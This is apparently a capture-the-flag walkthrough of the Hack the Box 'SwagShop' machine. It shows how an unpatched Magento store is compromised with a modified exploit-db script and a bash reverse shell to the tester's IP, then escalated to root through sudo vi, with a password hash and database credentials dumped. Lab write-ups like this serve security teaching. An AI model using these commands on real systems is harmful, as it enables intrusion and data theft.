Walkthrough of machine Swagshop from Hack the Box. Key findings include lack of patching on an ecommerce site & inappropriate privileges being given to a user accessible system account.
Walkthrough of SwagShop machine from Hack the Box.
Key findings noted from the machine SwagShop:
Nmap was used to complete an initial scan of the host (command: nmap -A -T4 -oA nmap/Swagshop 10.10.10.140). Amended outputs shown below:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Home page
Scan shows reported instances of:
Nmap scan failed to fingerprint the machine. The banner returned by OpenSSH suggests the machine is running Ubuntu Xenial (7.2p2 Ubuntu 4ubuntu2.8 – is the OpenSSH version available on Xenial). This suggests use of a reasonably recent operating system.
Loading up the web server presents what appears to be a normal Magento store.
Running magescan across the site (command: php magescan.phar scan:all http://10.10.10.140/) identifies the version as either 184.108.40.206 or 220.127.116.11.
Scanning http://10.10.10.140/... Magento Information +-----------+------------------+ | Parameter | Value | +-----------+------------------+ | Edition | Community | | Version | 18.104.22.168, 22.214.171.124 | +-----------+------------------+
Exploits available for Magento were researched and tested on the machine. A modified version of the exploit at https://www.exploit-db.com/exploits/37977 was successful in providing access to the store administration panel.
Details of the modification made (command: diff 37977.py 37977-modified.py) are below:
9,23d8 <SNIP> - Removed comments at top of the script 30c15 < target = "http://target.com/" --- > target = "http://10.10.10.140/index.php" 63,84d47 <SNIP> - Removed comments at the bottom of the script
Executing the exploit (command: python 37977-modified.py) then provided access to the admin panel:
WORKED Check http://10.10.10.140/index.php/admin with creds forme:forme
From researching attacks on Magento sites findings from FrogHopper attacks was found (https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper). Based on the guide steps taken to get initial access to the machine:
Confirmed as initial access via user www-data and running on kernel 4.4.0-146. Interactive user shell then setup using bash (command: bash -c ‘bash -i >& /dev/tcp/10.10.12.238/5565 0>&1’)
From reviewing the system, the user.txt file found in /home/haris directory:
www-data@swagshop:/home/haris$ wc -c user.txt wc -c user.txt 33 user.txt
Further basic enumeration reveals user www-data can run vim with superuser privileges.
www-data@swagshop:/home/haris$ sudo -l sudo -l Matching Defaults entries for www-data on swagshop: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on swagshop: (root) NOPASSWD: /usr/bin/vi /var/www/html/*
Loading vim and running !bash provides a root shell.
Hash for user haris ($6$vHexbEDw$yPt59EZF1JrEHwJ8qiwPNfzBEJd9ei.jG/Cdiw/Huj4pvX9tHovMR20ypKEcCjcxMb8lvlo9zu9BGYx1ipdRB/) was extracted. Cracking of it was attempted but unsuccessful.
Database credentials used by Magento were found in the file local.xml stored under /var/www/html/app/etc. Username is root and password is fMVWh7bDHpgZkyfqQXreTjU9.
Identified database credentials were used to dump a local copy of the data.
root@kali2019:~/Documents/SwagShop# wc -c dbdump.txt 4134404 dbdump.txt